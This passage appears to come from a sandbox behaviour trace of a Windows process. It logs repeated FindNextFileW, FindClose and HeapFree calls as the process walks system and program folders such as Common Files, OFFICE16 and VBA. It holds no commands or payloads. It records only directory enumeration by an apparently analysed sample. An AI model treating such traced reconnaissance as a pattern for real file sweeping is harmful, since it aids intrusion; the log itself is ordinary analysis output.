ftLastWriteTime.dwLowDateTime=0x2e2272ee, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ODBC", cAlternateFileName="")) returned 1 [0170.016] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0170.016] FindNextFileW (in: hFindFile=0x728288, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2e2272ee, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x2e2272ee, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2e2272ee, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Data Sources", cAlternateFileName="DATASO~1")) returned 0 [0170.016] FindClose (in: hFindFile=0x728288 | out: hFindFile=0x728288) returned 1 [0170.016] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0170.016] FindNextFileW (in: hFindFile=0x728108, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf23b4040, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf23b4040, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6354def, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SYSTEM", cAlternateFileName="")) returned 1 [0170.017] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0170.017] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf23b4040, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf23b4040, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf23b4040, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1033", cAlternateFileName="")) returned 0 [0170.017] FindClose (in: hFindFile=0x727608 | out: hFindFile=0x727608) returned 1 [0170.017] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0170.017] FindNextFileW (in: hFindFile=0x728288, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6354def, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf6354def, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfb8dd674, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ole db", cAlternateFileName="OLEDB~1")) returned 1 [0170.017] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0170.017] FindNextFileW (in: hFindFile=0x728288, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6354def, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf6354def, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfb8dd674, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ole db", cAlternateFileName="OLEDB~1")) returned 0 [0170.017] FindClose (in: hFindFile=0x728288 | out: hFindFile=0x728288) returned 1 [0170.017] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0170.017] FindNextFileW (in: hFindFile=0x728108, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf23b4040, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf23b4040, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6354def, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SYSTEM", cAlternateFileName="")) returned 0 [0170.017] FindClose (in: hFindFile=0x728108 | out: hFindFile=0x728108) returned 1 [0170.017] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0170.019] FindNextFileW (in: hFindFile=0x727d88, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x845a7d02, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf21ea38b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf21ea38b, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="ProgramFilesCommonX86", cAlternateFileName="PROGRA~4")) returned 1 [0170.023] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0170.023] FindNextFileW (in: hFindFile=0x728288, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefcf5b24, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf41cdbc1, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6296213, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Help", cAlternateFileName="")) returned 1 [0170.213] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0170.213] FindNextFileW (in: hFindFile=0x727a08, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1e56af1, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1e56af1, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1e56af1, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="1031", cAlternateFileName="")) returned 1 [0170.213] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0170.214] FindNextFileW (in: hFindFile=0x727a08, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0501a67, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf0501a67, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf0501a67, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="1033", cAlternateFileName="")) returned 1 [0170.214] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0170.214] FindNextFileW (in: hFindFile=0x727a08, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1ae94c9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1ae94c9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1ae94c9, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="1036", cAlternateFileName="")) returned 1 [0170.214] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0170.214] FindNextFileW (in: hFindFile=0x727a08, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6296213, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf6296213, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6296213, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="1040", cAlternateFileName="")) returned 1 [0170.215] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0170.215] FindNextFileW (in: hFindFile=0x727a08, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf41cdbc1, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf41cdbc1, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf41cdbc1, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="1041", cAlternateFileName="")) returned 1 [0170.216] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0170.216] FindNextFileW (in: hFindFile=0x727a08, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1329a43, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1329a43, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1329a43, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="1042", cAlternateFileName="")) returned 1 [0170.217] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0170.217] FindNextFileW (in: hFindFile=0x727a08, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1b81e2e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1b81e2e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1b81e2e, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="1046", cAlternateFileName="")) returned 1 [0170.217] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0170.217] FindNextFileW (in: hFindFile=0x727a08, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeff31e88, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeff31e88, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeff31e88, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="1049", cAlternateFileName="")) returned 1 [0170.218] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0170.218] FindNextFileW (in: hFindFile=0x727a08, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefcf5b24, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xefcf5b24, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xefcf5b24, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="2052", cAlternateFileName="")) returned 1 [0170.218] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0170.218] FindNextFileW (in: hFindFile=0x727a08, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefd68243, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xefd68243, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xefd68243, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="3082", cAlternateFileName="")) returned 1 [0170.219] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0170.219] FindNextFileW (in: hFindFile=0x727a08, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefd68243, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xefd68243, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xefd68243, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="3082", cAlternateFileName="")) returned 0 [0170.219] FindClose (in: hFindFile=0x727a08 | out: hFindFile=0x727a08) returned 1 [0170.219] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0170.219] FindNextFileW (in: hFindFile=0x728288, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc26f8376, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x28577965, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x28577965, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OFFICE16", cAlternateFileName="")) returned 1 [0170.223] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0170.223] FindNextFileW (in: hFindFile=0x727588, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf63ed72c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf63ed72c, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6a7bf80, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x48c0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="api-ms-win-core-file-l1-2-0.dll", cAlternateFileName="APDEA0~1.DLL")) returned 1 [0170.238] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0170.238] FindNextFileW (in: hFindFile=0x727588, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc2d86b0f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc2d86b0f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xc2d86b0f, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="en-us", cAlternateFileName="")) returned 1 [0170.238] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0170.238] FindNextFileW (in: hFindFile=0x727588, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x453c2a7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x453c2a7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x285ea0a0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x43cea0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="mfc140u.dll", cAlternateFileName="")) returned 1 [0170.242] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0170.242] FindNextFileW (in: hFindFile=0x728288, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefd8e49f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xefd8e49f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x6aef645, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Portal", cAlternateFileName="")) returned 1 [0170.243] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0170.243] FindNextFileW (in: hFindFile=0x727c48, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6aef645, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6aef645, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6aef645, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x250c0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="PortalConnectCore.dll", cAlternateFileName="PORTAL~1.DLL")) returned 1 [0170.243] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0170.243] FindNextFileW (in: hFindFile=0x728288, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6224b6a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xc968bf4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xc968bf4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VBA", cAlternateFileName="")) returned 1 [0170.244] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0170.244] FindNextFileW (in: hFindFile=0x727948, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc968bf4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xc968bf4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xc968bf4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="VBA7.1", cAlternateFileName="")) returned 1 [0170.252] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0170.252] FindNextFileW (in: hFindFile=0x727b88, lpFindFileData=0x3b3e918 | out: lpFindFileData=0x3b3e918*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc968bf4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcb32840, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcb32840, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 0 [0170.252] FindClose (in: hFindFile=0x727b88 | out: hFindFile=0x727b88) returned 1 [0170.252] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0170.252] FindNextFileW (in: hFindFile=0x727948, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc968bf4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xc968bf4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xc968bf4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="VBA7.1", cAlternateFileName="")) returned 0 [0170.252] FindClose (in: hFindFile=0x727948 | out: hFindFile=0x727948) returned 1 [0170.252] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0170.252] FindNextFileW (in: hFindFile=0x728288, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1c1a793, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1c1a793, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1c1a793, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Web Server Extensions", cAlternateFileName="WEBSER~1")) returned 1 [0170.254] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0170.254] FindNextFileW (in: hFindFile=0x727b88, lpFindFileData=0x3b3e918 | out: lpFindFileData=0x3b3e918*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1c1a793, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfbd7bf89, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfbd7bf89, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BIN", cAlternateFileName="")) returned 0 [0170.254] FindClose (in: hFindFile=0x727b88 | out: hFindFile=0x727b88) returned 1 [0170.254] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0170.254] FindNextFileW (in: hFindFile=0x727bc8, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1c1a793, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1c1a793, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1c1a793, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="16", cAlternateFileName="")) returned 0 [0170.254] FindClose (in: hFindFile=0x727bc8 | out: hFindFile=0x727bc8) returned 1 [0170.255] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0170.255] FindNextFileW (in: hFindFile=0x728288, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1c1a793, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1c1a793, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1c1a793, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Web Server Extensions", cAlternateFileName="WEBSER~1")) returned 0 [0170.255] FindClose (in: hFindFile=0x728288 | out: hFindFile=0x728288) returned 1 [0170.255] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0170.255] FindNextFileW (in: hFindFile=0x728108, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf21ea38b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf21ea38b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf21ea38b, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="System", cAlternateFileName="")) returned 1 [0170.256] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0170.256] FindNextFileW (in: hFindFile=0x728288, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf21ea38b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf21ea38b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf7b78b8d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ole db", cAlternateFileName="OLEDB~1")) returned 0 [0170.256] FindClose (in: hFindFile=0x728288 | out: hFindFile=0x728288) returned 1 [0170.256] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0170.256] FindNextFileW (in: hFindFile=0x728108, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf21ea38b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf21ea38b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf21ea38b, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="System", cAlternateFileName="")) returned 0 [0170.256] FindClose (in: hFindFile=0x728108 | out: hFindFile=0x728108) returned 1 [0170.256] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0170.259] FindNextFileW (in: hFindFile=0x727d88, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x845a7d02, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x2e11c27d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2e11c27d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="ProgramFilesX64", cAlternateFileName="PROGRA~1")) returned 1 [0170.279] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: 